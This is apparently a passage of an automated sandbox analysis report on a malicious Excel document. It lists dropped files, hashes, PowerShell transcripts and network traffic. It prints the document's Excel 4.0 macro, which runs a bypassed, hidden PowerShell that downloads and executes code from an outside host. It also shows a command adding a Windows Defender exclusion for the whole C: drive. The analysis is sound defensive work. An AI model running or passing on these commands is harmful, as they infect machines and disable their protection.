                                                                                                                                                                                                    Preview: L..................F.... ...X..S.....OK......OK..................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..(R@D....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N..(R@D....#J....................$._.j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N..(R@D.....Y..............>......w&.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....(RHD .TELEX0~1.XLS..T......>Q{<(RHD.....V......................C.T.e.l.e.x.0.6.0.1.2.0.2.0...x.l.s.......W...............-.......V...........>.S......C:\Users\user\Desktop\Telex06012020.xls..(.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.e.l.e.x.0.6.0.1.2.0.2.0...x.l.s.........:..,.LB.)...As...`.......X.......179605...........!a..%.H.VZAj...{................!a..%.H.VZAj...{...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2....
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):92
                                                                                                                                                                                                    Entropy (8bit):4.1711745601340615
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:oyBVomMHZOVX/6lphZOVX/6lmMHZOVX/6lv:dj6M9S7W9SxM9S1
                                                                                                                                                                                                    MD5:0A818CE42B82E28C18F24F1461724805
                                                                                                                                                                                                    SHA1:A8825698DD788B8C2236FF6BEFB7235D0938A1ED
                                                                                                                                                                                                    SHA-256:D29555390CEE036E08F72AB94C450ADFAF4244F6318837DB856DA042C607EE07
                                                                                                                                                                                                    SHA-512:4824E4170BC4DC4022AB1ABDE52BC3ADC2F0DD3A95756CEAA115CFA04805489B2FCBED0DC14D8C339E73424450BCAB2A3ED5E4D11E97DB1CF4A1C55EF66BBDF0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: Desktop.LNK=0..[xls]..Telex06012020.LNK=0..Telex06012020.LNK=0..[xls]..Telex06012020.LNK=0..
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):22
                                                                                                                                                                                                    Entropy (8bit):2.9808259362290785
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                                                    MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                                                    SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                                                    SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                                                    SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\sztmmjA.tmp
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                    Entropy (8bit):0.792852251086831
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\Desktop\DCC40000
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):137610
                                                                                                                                                                                                    Entropy (8bit):7.509226913581185
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:o4xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAGHwSJtUkUlR/FoeHxv7nalHDCfZoCF0:BxEtjPOtioVjDGUU1qfDlavx+W2QnAyp
                                                                                                                                                                                                    MD5:CE5E8C9996E3AB34AC28489F2A3C8C55
                                                                                                                                                                                                    SHA1:147F9B4BFA526ACE9F31E5A8E509A4771AEEB7D8
                                                                                                                                                                                                    SHA-256:24D474665891192B3D310E2AD4AAF1484EE7FE764478C9FA5E2A475F07D26AF1
                                                                                                                                                                                                    SHA-512:6F913C3CEF7298186CAE737B9516848CBD7B27B176F2BDAC9B02F41B2B6D7BD4CE1FF74E05B44516484FF3D351D0DD6038262B40504D1EACA94DE14D63D08D29
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\Desktop\DCC40000, Author: Florian Roth
                                                                                                                                                                                                    Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....<.WN..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.........."$"
                                                                                                                                                                                                    C:\Users\user\Documents\20210108\PowerShell_transcript.179605.1KVzgujm.20210108093427.txt
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1285
                                                                                                                                                                                                    Entropy (8bit):5.303199615941223
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:BxSAXm7vBZuzx2DOXC0fD/jLW7HjeTKKjX4CIym1ZJX/IJD/j1fvfuKs8MXiV+Ps:BZ8vjeoOVq7qDYB1Z0t3ZW2+rgZoZZdC
                                                                                                                                                                                                    MD5:10DB2489170F4AD7B069CF5E861DD6B6
                                                                                                                                                                                                    SHA1:84015D396BAB988BC4F2E41C7F6480E75FC90217
                                                                                                                                                                                                    SHA-256:D8AC486E4558FBAA4DE42E516D31FBE7F80F5C2716E3829E1196CA366434D1DE
                                                                                                                                                                                                    SHA-512:BD20F1BBE293CD2202290C2587B65EC22BAA481A0B5C88B9D23CB3CE3F962DC25142B67486D313EEFA95E9765569385A0093268AA5FFF60C5D2178B75945E012
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210108093440..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))..Process ID: 5848..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210108093440..**********************..PS>iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))..False..C:\Users\user\AppData\Local\Temp\Test1.txt..C:\Users\user\AppData\Local\Temp\Test2.gif.. 1 file(s) copied...Executing (Win32_Process)->Create()..Method execution successful...Out Parameters:..instance of __
                                                                                                                                                                                                    C:\Users\user\Documents\20210108\PowerShell_transcript.179605.XuKY+ytb.20210108093520.txt
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5048
                                                                                                                                                                                                    Entropy (8bit):5.386219134914956
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:BZDjeN5sqDo1ZIZJjeN5sqDo1ZPM6UjZDjeN5sqDo1ZpFEEGZR:2y65
                                                                                                                                                                                                    MD5:B418FE0C9462B2B60E822C15FF7CA680
                                                                                                                                                                                                    SHA1:4B9F928A980EB8843454A1CD233D055034014EE5
                                                                                                                                                                                                    SHA-256:3667AC287C119EE21B3D6C58B1D2E7C864E92B95413C8721D33255AB185219B7
                                                                                                                                                                                                    SHA-512:2EFEC64E148C2FA558DD51B73A6D40CF514C0F48870493922CF6F8A97E43B33E0F48CC56D33A0B7D36BCD7239ED146567C97EDA848C3EB3F4B7075DC870A49A6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210108093537..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 5368..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210108093537..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20210108093841..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus
                                                                                                                                                                                                    \Device\ConDrv
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):160
                                                                                                                                                                                                    Entropy (8bit):5.095703110114614
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgkSH0wFJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egkSH0qE
                                                                                                                                                                                                    MD5:DDDE552835D6965F874AE689CF0790A6
                                                                                                                                                                                                    SHA1:FD84334F01C4A23F1E8E8A1E273EDB20D0F227BA
                                                                                                                                                                                                    SHA-256:B21EF0761891F98BA637444A9390F8048920081EC4848B8EC88229E9B85BE387
                                                                                                                                                                                                    SHA-512:F6864733F63CBDC50B1435CACA0DAAED1F4AB9F1806147B3E4BB59BA421B056B022D7C08E2FF0B8543E1C016D82A595CCAA0255466ABD93EA0A9F1114CE2FDEF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 6852;...ReturnValue = 0;..};....

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: OBA, Last Saved By: OBA, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 6 16:14:54 2021, Last Saved Time/Date: Wed Jan 6 16:18:07 2021, Security: 0
                                                                                                                                                                                                    Entropy (8bit):7.63969342616772
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Microsoft Excel sheet (30009/1) 45.83%
                                                                                                                                                                                                    • Microsoft Works Spreadsheet (27457/6) 41.94%
                                                                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.23%
                                                                                                                                                                                                    File name:Telex06012020.xls
                                                                                                                                                                                                    File size:122880
                                                                                                                                                                                                    MD5:c221348cc4be1ca5c8d1fe510c672e57
                                                                                                                                                                                                    SHA1:b7bbcb23c92782d871a684afc34e4c8264e96b8e
                                                                                                                                                                                                    SHA256:07a877cc1499b20ae7bcaf0200f2576a100754fa661e391f36cbb95aa58a75b9
                                                                                                                                                                                                    SHA512:6cd55b442d3513b6377b595f5a05b7914133ff4c0630b57579f6927a8366e1117086d5cd00d07c3fd3ec9a9b0d9472900ac3638200d92a8222072dc40d793d84
                                                                                                                                                                                                    SSDEEP:3072:dfZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAfHgSJtM2slx/FQeHxvjnqlHDCfVoCF:RZ+RwPONXoRjDhIcp0fDlavx+W26nAve
                                                                                                                                                                                                    File Content Preview:........................>.......................................................b..............................................................................................................................................................................

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                                    Static OLE Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Document Type:OLE
                                                                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                                                                    OLE File "Telex06012020.xls"

                                                                                                                                                                                                    Indicators

                                                                                                                                                                                                    Has Summary Info:True
                                                                                                                                                                                                    Application Name:Microsoft Excel
                                                                                                                                                                                                    Encrypted Document:False
                                                                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                                                                    Flash Objects Count:
                                                                                                                                                                                                    Contains VBA Macros:True

                                                                                                                                                                                                    Summary

                                                                                                                                                                                                    Code Page:1252
                                                                                                                                                                                                    Author:OBA
                                                                                                                                                                                                    Last Saved By:OBA
                                                                                                                                                                                                    Create Time:2021-01-06 16:14:54
                                                                                                                                                                                                    Last Saved Time:2021-01-06 16:18:07
                                                                                                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                                                                                                    Security:0

                                                                                                                                                                                                    Document Summary

                                                                                                                                                                                                    Document Code Page:1252
                                                                                                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                                                                                                    Contains Dirty Links:False
                                                                                                                                                                                                    Shared Document:False
                                                                                                                                                                                                    Changed Hyperlinks:False
                                                                                                                                                                                                    Application Version:786432

                                                                                                                                                                                                    Streams

                                                                                                                                                                                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x1CompObj
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:114
                                                                                                                                                                                                    Entropy:4.25248375193
                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 288
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:288
                                                                                                                                                                                                    Entropy:3.22237115402
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
                                                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:200
                                                                                                                                                                                                    Entropy:3.44023669415
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O B A . . . . . . . . . O B A . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . S j . G . . . @ . . . . . s . G . . . . . . . . . . .
                                                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 118310
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:Workbook
                                                                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                    Stream Size:118310
                                                                                                                                                                                                    Entropy:7.74604422094
                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . O B A B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . < . W N . . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                                                                                                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 4f 42 41 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                                                                    "=                            cItARKOyQs0SudK                         &            t1Bg8ysdvhEcSX0v9DVkRr1spwdW3kKqnK3                          &EXEC(""CmD.Exe  /C poWeRSheLL.EXe  -ex BYPAsS -NoP -w 1 iEx( curL  ('http://lankarecipes.com/mages.jp'  + 'g' ))"")"=  HALT()

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                    TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                                                                                                                                                                                    UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                    Jan 8, 2021 09:35:01.071927071 CET53558548.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:01.438055038 CET6454953192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:01.486090899 CET53645498.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:01.652700901 CET6315353192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:01.711103916 CET53631538.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:02.415011883 CET5299153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:02.463038921 CET53529918.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:03.068269968 CET5370053192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:03.116374016 CET53537008.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:03.436655045 CET5172653192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:03.501081944 CET53517268.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:03.799073935 CET5679453192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:03.847184896 CET53567948.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:04.461044073 CET5653453192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:04.519684076 CET53565348.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:05.148782015 CET5662753192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:05.199683905 CET53566278.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:06.196203947 CET5662153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:06.255413055 CET53566218.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:07.485481977 CET6311653192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:07.533351898 CET53631168.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:08.052906990 CET6407853192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:08.103848934 CET53640788.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:17.736723900 CET6480153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:17.794236898 CET53648018.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:26.740106106 CET6172153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:26.788059950 CET53617218.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:27.832349062 CET5125553192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:27.883151054 CET53512558.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:28.678677082 CET6152253192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:28.737862110 CET53615228.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:29.505609989 CET5233753192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:29.553688049 CET53523378.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:30.348684072 CET5504653192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:30.396579981 CET53550468.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:31.162801981 CET4961253192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:31.210721970 CET53496128.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:32.180682898 CET4928553192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:32.228559971 CET53492858.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:33.177069902 CET5060153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:33.228005886 CET53506018.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:35.227447033 CET6087553192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:35.278220892 CET53608758.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:36.259691954 CET5644853192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:36.308437109 CET53564488.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:37.616547108 CET5917253192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:37.667363882 CET53591728.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:38.440494061 CET6242053192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:38.488507986 CET53624208.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:40.361651897 CET6057953192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:40.409610033 CET53605798.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:41.209323883 CET5018353192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:41.257204056 CET53501838.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:42.041253090 CET6153153192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:42.091996908 CET53615318.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:43.765337944 CET4922853192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:43.824677944 CET53492288.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:46.709853888 CET5979453192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:46.757631063 CET53597948.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:55.405963898 CET5591653192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:55.453874111 CET53559168.8.8.8192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:35:58.299429893 CET5275253192.168.2.48.8.8.8
                                                                                                                                                                                                    Jan 8, 2021 09:35:58.366627932 CET53527528.8.8.8192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 8, 2021 09:34:52.840903044 CET | 192.168.2.4 | 8.8.8.8 | 0x9042 | Standard query (0) | lankarecipes.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 8, 2021 09:34:53.042937040 CET | 8.8.8.8 | 192.168.2.4 | 0x9042 | No error (0) | lankarecipes.com | (none) | 192.185.236.165 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• lankarecipes.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49728 | 192.185.236.165 | 80 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Jan 8, 2021 09:34:53.247750044 CET | 110 | OUT | GET /mages.jpg HTTP/1.1
